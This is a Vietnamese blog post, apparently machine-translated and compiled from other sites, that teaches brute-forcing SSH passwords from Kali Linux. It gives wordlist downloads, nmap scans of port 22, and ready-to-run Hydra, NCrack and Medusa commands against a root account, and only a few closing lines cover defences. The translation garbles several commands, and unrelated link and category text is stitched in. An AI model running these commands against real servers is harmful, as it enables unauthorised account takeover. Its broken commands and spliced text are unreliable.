Hello quý khách. Bữa nay, mình xin chia sẽ về chủ đề Hướng Dẫn Sử Dụng Phần Mềm Brute Force, Brute Force Attack Và Cách Phòng Chống bằng bài viết Hướng Dẫn Sử Dụng Phần Mềm Brute Force, Brute Force Attack Và Cách Phòng Chống
Phần lớn nguồn đều đc lấy thông tin từ những nguồn website đầu ngành khác nên sẽ có vài phần khó hiểu.
Mong mọi người thông cảm, xin nhận góp ý và gạch đá dưới bình luận
Xin quý khách đọc nội dung này ở nơi riêng tư cá nhân để có hiệu quả tốt nhất
Tránh xa tất cả những thiết bị gây xao nhoãng trong công việc tập kết
Bookmark lại nội dung bài viết vì mình sẽ update hàng tháng
Xin chào mọi người, hôm nay bạn có khỏe không: D. Tôi vừa học được một phương pháp hack mới, tôi muốn giới thiệu với các bạn ngay sau đây. Đó là phương pháp Brute Force Attack mà tôi sẽ cùng bạn tìm hiểu và cách thực hiện trên nền tảng Kali Linux. Bài viết sẽ cố gắng trình bày nó một cách đơn giản nhất, và giải thích tất cả những gì bạn muốn biết.
Bạn đang xem: hướng dẫn sử dụng phần mềm brute force
Đầu tiên, SSH là gì?
Đối với những người quản trị hệ thống sẽ không còn xa lạ với thuật ngữ này. SSH là từ viết tắt của Secure Shell, truy cập máy từ xa thông qua cơ chế dòng lệnh được mã hóa. SSH giúp người dùng dễ dàng kết nối với cục bộ và truy cập máy tính từ xa. Trên hệ thống Linux / Unix, SSH có thể được cài đặt dễ dàng, tương tự như trên máy tính Windows.
Các ứng dụng SSH?
Như đã thảo luận, SSH cung cấp xác thực mạnh mẽ và dữ liệu kết nối được mã hóa giữa hai máy tính trong một môi trường không an toàn như Internet. Hiện tại, giao thức này đã được hầu hết các quản trị viên hệ thống sử dụng để kết nối từ xa với các máy khác, thực hiện các thao tác dòng lệnh, tạo, chỉnh sửa và xóa các tập tin trên các máy khác.
SSH sử dụng thuật toán mã hóa RSA, tạo đường hầm kết nối giữa máy chủ và máy từ xa. Dữ liệu trao đổi giữa hai máy này sẽ được mã hóa để hacker không thể bắt gói tin và giải mã được.
Brute Force Attack là gì?
Hình trên minh họa hoàn toàn phương pháp Brute Force Attack. Chúng ta hãy xem xét kỹ hơn và tìm hiểu nó hoạt động như thế nào.
Brute Force Attack hoạt động bằng cách kiểm tra lần lượt từng tổ hợp mật khẩu có thể có, sau đó kiểm tra xem đó có phải là mật khẩu chính xác hay không. Để biết mật khẩu là đúng hay sai, nó sẽ kiểm tra kết quả trả về của máy chủ.
Với mật khẩu dài hơn, thời gian dò tìm mật khẩu cũng sẽ tăng lên tương ứng. Vì vậy, chúng tôi hiểu tại sao các chuyên gia bảo mật luôn khuyến khích người dùng đặt mật khẩu càng dài càng tốt.
Trong nhiều trường hợp, chúng tôi đã sử dụng phương pháp tấn công từ điển để phát hiện mẫu Mật khẩu chính xác. Trong phương pháp này, tôi được cung cấp một công cụ có danh sách mật khẩu có thể được sử dụng cho hệ thống đích và nó sẽ bắt đầu quét cho đến khi mật khẩu khớp với mẫu mà người dùng sử dụng.
Những mật khẩu tương đối yếu như 123456 hay password tuy ít nhưng vẫn có người sử dụng, nếu may mắn chúng ta có thể mở khóa mật khẩu với thời gian nhanh nhất.
Hình ảnh này cho thấy cách thức hoạt động của cuộc tấn công Brute Force.
Brute Force SSH:
Bây giờ bạn đã biết cách Brute Force hoạt động, hãy chuyển sang bước tiếp theo. Trong suốt chủ đề này, chúng tôi sẽ sử dụng một cuộc tấn công từ điển để lấy mật khẩu của Người dùng SSH.
Xem thêm: Kiểm Tra Số Tài Khoản Ngân Hàng Đông Á, Ngân hàng Đông Á điện tử
Để thực hiện cuộc tấn công này, chúng ta cần một danh sách các từ thường được sử dụng để đặt mật khẩu, và công cụ sẽ liên tục kết hợp các từ này với nhau để tạo ra từng mẫu mật khẩu. Danh sách nguồn của các từ khóa mật khẩu thường được sử dụng có thể được tìm thấy tại đây.
Ví dụ về loại mật khẩu này là thanhtam0911 trong đó Thanh Tâm là tên của người bị hack, 09-11 là ngày sinh của họ. Một chương trình rất tốt có thể được sử dụng để dịch những từ khóa này là D0xk1t của Ex0dus_0x, bạn có thể tải xuống tại đây.
Bạn cũng có thể tải xuống các danh sách từ khóa khác bằng cách gõ lệnh:
wget //zeldor.biz/other/bruteforce/passlist.txt
wget //downloads.skullsecurity.org/passwords/500-worst-passwords.txt.bz2
//hashes.org/crackers.php
//wiki.skullsecurity.org/Passwords
và nếu bạn đang sử dụng Kali Linux, bạn có thể xem danh sách từ khóa mặc định được đặt tại:
/usr/share/wordlists/rockyou.txt.gz
Quét Máy chủ SSH bằng NMAP:
Sau khi đã chuẩn bị đầy đủ các công cụ để tấn công, bước tiếp theo cần làm là tìm xem máy chủ nào đang chạy SSH. Chúng tôi sẽ sử dụng NMAP để quét cổng 22, là cổng của dịch vụ SSH.
Trong ví dụ này, vì chúng ta chỉ cần tìm SSH Server trong mạng cục bộ, chúng ta sẽ quét mạng 192.168.1.0/24. Đây là lệnh NMAP mà bạn có thể sử dụng để quét tất cả các máy tính:
nmap 192.168.1.0/24 -p22
Quét một máy cụ thể:
Nếu bạn muốn cố gắng tấn công vào một máy chủ từ xa nhất định, bạn phải quét cổng ssh đang mở trên đó bằng lệnh:
nmap -p22
Thực hiện một cuộc tấn công Brute Force SSH:
Sau khi hoàn thành mọi khâu chuẩn bị, chúng ta sẽ đến với phần chính của bài viết, tấn công Brute Force. Các công cụ được sử dụng bao gồm:
HydraNCrackMedusa
Sử dụng Hydra:
Hydra là một công cụ được sử dụng phổ biến, rất mạnh mẽ. Nếu bạn sử dụng hệ điều hành Kali Linux, công cụ này đã được cài đặt sẵn. Và đối với các phiên bản Debian khác, hãy sử dụng lệnh:
sudo apt-get install hydra hydra-gtk
Phiên bản Hydra 8.0: có thể được cài đặt từ kho: ppa: pi-rho / security
sudo add-apt-repository ppa: pi-rho / security
sudo apt-get cập nhật
sudo apt-get install hydra
Một tùy chọn cài đặt khác:
wget //www.thc.org/releases/hydra-8.3.tar.gz
tar -xvzf hydra-8.3.tar.gz
cd hydra-8.3 ./configure make
thực hiện cài đặt
Sau khi cài đặt, chúng tôi có thể khởi động cuộc tấn công.
Lệnh sử dụng hydra:
: ~ / Desktop # hydra -l root -P /root/Desktop/500-worst-passwords.txt 192.168.1.31 ssh
Như bạn thấy, Hydra đã thành công trong việc tìm ra tài khoản và mật khẩu dùng để đăng nhập vào hệ thống.
Đây là video giải thích quá trình tấn công.
Sử dụng NCrack:
Công cụ thứ hai được sử dụng là NCrack, cũng được cài đặt sẵn trong Kali Linux và bạn cũng có thể cài đặt nó trong các phiên bản Debian khác:
wget //nmap.org/ncrack/dist/ncrack-0.5.tar.gz
tar -xvzf ncrack-0.5.tar.gz
cd ncrack-0,5
./configure
chế tạo
thực hiện cài đặt
Quá trình cài đặt sẽ diễn ra và sau đó bạn có thể chạy công cụ để bẻ khóa mật khẩu.
: ~ / Desktop # ncrack -p 22 user root -P /root/Desktop/500-worst-passwords.txt 192.168.1.31
Công cụ đã phát hiện tên người dùng và mật khẩu. Dưới đây là video hướng dẫn.
Sử dụng Medusa:
Đây là công cụ cuối cùng trong bài có thể dùng để thực hiện Brute Force Attack, hãy cài đặt công cụ:
wget //www.foofus.net/jmk/tools/medusa-2.0.tar.gz
tar -xvzf medusa-2.0.tar.gz
cd medusa-2.0
./configure
chế tạo
thực hiện cài đặt
Lệnh dùng để bẻ khóa mật khẩu:
: ~ / Desktop # medusa -u root -P /root/Desktop/500-worst-passwords.txt -h 192.168.1.31 -M ssh
Như trong hình, phần mềm đã phát hiện người dùng và mật khẩu. Dưới đây là Hình minh họa Video.
Vậy nếu rơi vào trường hợp nạn nhân, bạn phải làm gì để phòng tránh cơn nguy kịch?
Các phương pháp thường được khuyến nghị để tránh các cuộc tấn công thường được triển khai là:
Chạy SSH trên các Cổng khác [ngoài 22] Chặn Đăng nhập SSH bằng tài khoản Người dùng gốc. Cài đặt bằng Fail2ban. Hạn chế số lần đăng nhập của người dùng.
Tóm lược :
Qua bài kiểm tra, chúng tôi rút ra được một kinh nghiệm đó là: đừng bao giờ sử dụng Mật khẩu đơn giản. Và chúng tôi cũng biết cách sử dụng Công cụ để kiểm tra và thử nghiệm các vấn đề. Mọi ý kiến đóng góp các bạn vui lòng để lại bình luận bên dưới bài viết, rất vui vì những đóng góp của các bạn để Website ngày càng hoàn thiện hơn.
Huong dan brute force attackMáy chủ ssh tấn công Brute ForceCông cụ tấn công vũ lựcNgăn chặn cuộc tấn công bằng lực lượng chổi quét máy chủ ssh
Thể loại: Đầu tư
Nguồn tổng hợp